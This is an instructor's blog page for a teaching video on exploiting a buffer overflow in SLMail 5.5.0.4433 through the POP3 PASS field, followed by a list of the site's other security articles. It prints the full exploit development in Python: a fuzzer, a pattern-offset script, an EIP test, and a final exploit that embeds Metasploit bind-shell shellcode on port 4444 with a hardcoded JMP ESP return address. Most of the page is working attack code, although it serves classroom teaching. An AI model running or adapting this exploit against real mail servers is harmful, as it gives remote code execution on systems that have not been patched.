John Pierce

. CISSP, SLAE, Security+

Buffer Overflow of SLMail 5.5.0.4433 - full development

This video was developed to show my first year undergraduate students an example of how to develop a buffer overflow exploit.  It was a demonstration of a vulnerability discovered and published by Muts in 2004, exploited on a Windows XP SP3 machine using Python, Immunity Debugger, and Metasploit. 

 

If you can't view flash video on your device, the original, you can get the mp4 version here.

Code from the video follows:

First go at fuzzing to find the existence and terms of the overflow:

#!/usr/bin/python

import socket

# create an array of buffers of varying lengths

buffer = ["A"]
counter = 2020
while len(buffer) <= 30:
	buffer.append("A"*counter)
	counter = counter + 100

# now we step through the buffers

for string in buffer:
	print "Sending buffer length "+str(len(string))
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect = s.connect(('172.16.32.110',110))
	s.recv(1024)
	s.send("USER john\r\n")
	s.recv(1024)
	s.send("PASS "+string+"\r\n")
	s.recv(1024)
	s.send("QUIT\r\n")
	s.close()

 

Now find what part of the string goes into each register that can be controlled:


#!/usr/bin/python

import socket

# create an array of buffers of varying lengths

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2D"
print "Sending buffer length "+str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('172.16.32.110',110))
s.recv(1024)
s.send("USER john\r\n")
s.recv(1024)
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()


Test to make sure everything works before putting in the shellcode:

#!/usr/bin/python

import socket

# create an array of buffers of varying lengths

buffer = "A"*2602 + "BBBB" + "CCCC" + "D" * 10 + "E" * 1000
print "Sending buffer length "+str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('172.16.32.110',110))
s.recv(1024)
s.send("USER john\r\n")
s.recv(1024)
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()



And here's the final exploit:

#!/usr/bin/python

import socket

# create an array of 2602 bytes to ebp, 2606 eip, 2610 where esp points,
# and we have 424 bytes for shellcode
# jmp esp instruction user32.dll is at 0x7e429353
'''
/*
 * windows/shell_bind_tcp - 424 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * NOP gen: x86/opty2
 * AutoRunScript=, EXITFUNC=thread, InitialAutoRunScript=, 
 * LPORT=4444, RHOST=
 */
'''
shellcode = ("\xb3\xe0\x05\xa9\x4b\x74\x0c\xa8\x1d\x66\x42\x3f\x27\x13\xd5"
"\x14\x4e\x86\xfd\x43\xbf\x9b\x8d\x41\x2f\x99\xba\xb4\x40\x90"
"\x3c\xb2\xb8\xb6\x1c\x15\x98\xb5\x34\xc0\xf8\x93\x37\xd4\x85"
"\xf9\x49\x2d\xb7\x24\x67\x04\x9f\x4f\x4a\x97\xd9\xf6\xbb\x2c"
"\xae\x03\x18\xd9\x74\x24\xf4\x33\xc9\xb1\x56\x5e\x31\x5e\x18"
"\x03\x5e\x18\x83\xee\xd0\x4c\xf6\xe4\xc0\x18\xf9\x14\x10\x7b"
"\x73\xf1\x21\xa9\xe7\x71\x13\x7d\x63\xd7\x9f\xf6\x21\xcc\x14"
"\x7a\xee\xe3\x9d\x31\xc8\xca\x1e\xf4\xd4\x81\xdc\x96\xa8\xdb"
"\x30\x79\x90\x13\x45\x78\xd5\x4e\xa5\x28\x8e\x05\x17\xdd\xbb"
"\x58\xab\xdc\x6b\xd7\x93\xa6\x0e\x28\x67\x1d\x10\x79\xd7\x2a"
"\x5a\x61\x5c\x74\x7b\x90\xb1\x66\x47\xdb\xbe\x5d\x33\xda\x16"
"\xac\xbc\xec\x56\x63\x83\xc0\x5b\x7d\xc3\xe7\x83\x08\x3f\x14"
"\x3e\x0b\x84\x66\xe4\x9e\x19\xc0\x6f\x38\xfa\xf0\xbc\xdf\x89"
"\xff\x09\xab\xd6\xe3\x8c\x78\x6d\x1f\x05\x7f\xa2\xa9\x5d\xa4"
"\x66\xf1\x06\xc5\x3f\x5f\xe9\xfa\x20\x07\x56\x5f\x2a\xaa\x83"
"\xd9\x71\xa3\x60\xd4\x89\x33\xee\x6f\xf9\x01\xb1\xdb\x95\x29"
"\x3a\xc2\x62\x4d\x11\xb2\xfd\xb0\x99\xc3\xd4\x76\xcd\x93\x4e"
"\x5e\x6d\x78\x8f\x5f\xb8\x2f\xdf\xcf\x12\x90\x8f\xaf\xc2\x78"
"\xda\x3f\x3d\x98\xe5\x95\x48\x9e\x2b\xcd\x19\x49\x4e\xf1\x8c"
"\xd5\xc7\x17\xc4\xf5\x81\x80\x70\x34\xf6\x18\xe7\x47\xdc\x34"
"\xb0\xdf\x68\x53\x06\xdf\x68\x71\x25\x4c\xc0\x12\xbd\x9e\xd5"
"\x03\xc2\x8a\x7d\x4d\xfb\x5d\xf7\x23\x4e\xff\x08\x6e\x38\x9c"
"\x9b\xf5\xb8\xeb\x87\xa1\xef\xbc\x76\xb8\x65\x51\x20\x12\x9b"
"\xa8\xb4\x5d\x1f\x77\x05\x63\x9e\xfa\x31\x47\xb0\xc2\xba\xc3"
"\xe4\x9a\xec\x9d\x52\x5d\x47\x6c\x0c\x37\x34\x26\xd8\xce\x76"
"\xf9\x9e\xce\x52\x8f\x7e\x7e\x0b\xd6\x81\x4f\xdb\xde\xfa\xad"
"\x7b\x20\xd1\x75\x9b\xc3\xf3\x83\x34\x5a\x96\x29\x59\x5d\x4d"
"\x6d\x64\xde\x67\x0e\x93\xfe\x02\x0b\xdf\xb8\xff\x61\x70\x2d"
"\xff\xd6\x71\x64")

buffer = "A"*2602 + "BBBB" + '\x53\x93\x42\x7e' + shellcode

print "Sending buffer length "+str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.56.101',110))
s.recv(1024)
s.send("USER john\r\n")
s.recv(1024)
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()

 

 

 

Most Recent Articles

First bit::

This is a writeup of the format string vulnerability in level 4 of the 64bitprimer VM from vulnhu

First bit::

Installation of the software to make a yubikey 4 work in FIDO U2F mode on Debian Jessie i386

First bit::

Lesson(s) learned

First bit::

This one stumped me. Overall, it was a great competition for me as I got to learn a whole lot of new things. I had never worked on a Mac, other than as a user, had never used Hopper, lldb or any of the other tools for reversing on a Mac, and haven't got any experience in the Objective C/Swift framework.

First bit::

4 rounds, lots of debugging

Videos

Categories: Network security, Videos
First bit::

Explains the workings of a DMZ, walks through setting up and testing of a DMZ in a virtual machine lab environment

Categories: Network security, Videos
First bit::

In this video I go through the process of setting up an SSH tunnel to hide an IP and also setting

Categories: Exploits, Videos
First bit::

Useful for someone who is interested in what a buffer overflow is. Does not go into the details of development, just explains generally and demonstrates the use of one.

Categories: Exploits, Videos
First bit::

a demonstration of a vulnerability discovered and published by Muts in 2004, exploited on a Windows XP SP3 machine using Python, Immunity Debugger, and Metasploit.

Categories: Network security, Videos
First bit::

In this video I demo some simple iptables rules and show them how to perform network traffic analysis to test them out.